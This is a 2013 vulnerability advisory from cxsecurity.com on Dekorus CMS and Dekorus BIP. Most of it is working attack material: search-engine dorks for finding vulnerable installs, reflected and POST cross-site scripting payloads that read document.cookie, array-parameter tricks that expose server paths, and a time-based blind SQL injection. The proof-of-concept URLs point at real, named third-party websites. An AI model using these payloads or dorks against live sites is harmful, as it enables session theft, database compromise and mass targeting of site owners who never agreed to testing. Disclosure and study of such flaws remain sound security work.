Dekorus CMS & Dekorus BIP Multiple Vulnerabilities

2013.11.10
Credit: Smash_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
Dork: inurl:\"by Dekorus\" OR inurl:\"/content.php?mod=\" OR intext:\"dekorus.com.pl\"

Title: Dekorus CMS & Dekorus BIP Multiple Vulnerabilities Vendor: dekorus.com.pl Dork: inurl:"by Dekorus" OR inurl:"/content.php?mod=" OR intext:"dekorus.com.pl" OR inurl:"content.php?sid=" OR inurl:"cms_id=" AND intext:"dekorus" (use your imagination) Date: 09.11.13 Contact: smash [at] devilteam.pl 1. Cross Site Scripting Affected GET parameters: cms_id= sid= mod= y= mt= kat= m_id= tr= lang= mt= page= Propabbly more. PoC: http://pawelsuski.pl/content.php?sid=&tr=cl&cms_id=752&m_id=752&kat=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://ateny.zwa.pl/content.php?sid=&tr=cl%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&cms_id=69&m_id=69&kat= 2. Full Path Disclosure a ) Search Form FPD POST q=[] PoC: http://www.dekorus.com.pl/content.php POST - q=[] Warning: eregi() [function.eregi]: REG_EBRACK in /home/dekorus/WWW/d/dekorus.com.pl/content.php on line 972 b) Photo inclusion FPD GET /cms_inc/cms_galeria_show.php?foto=http:/ PoC: http://ateny.zwa.pl/cms_inc/cms_galeria_show.php?foto=http:/ Warning: Cannot modify header information - headers already sent by (output started at /home/dekorus/WWW/domeny/a/ateny.zwa.pl/cms_inc/cms_galeria_show.php:8) in /home/dekorus/WWW/domeny/a/ateny.zwa.pl/cms_config/admin_config.php on line 149 c) Admin Panel FPD /cms_admin/cms_zaloguj.php POST - ver_login[]=1&ver_password[]=2 PoC: http://www.dekorus.com.pl/cms_admin/cms_zaloguj.php Warning: md5() expects parameter 1 to be string, array given in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 49 Warning: crypt() expects parameter 2 to be string, array given in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 49 Warning: Cannot modify header information - headers already sent by (output started at /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php:49) in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 80 3. Dekorus BIP Blind SQL Injection (For BIP dork you will need to add inurl:bip) host/content.php?cms_id=[SQLi] PoC: http://bip.pwsz.eu/content.php?cms_id=280+and+sleep%2810%29-- 4. Dekorus BIP POST XSS /sprawa.php POST - "><script>alert(document.cookie)</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top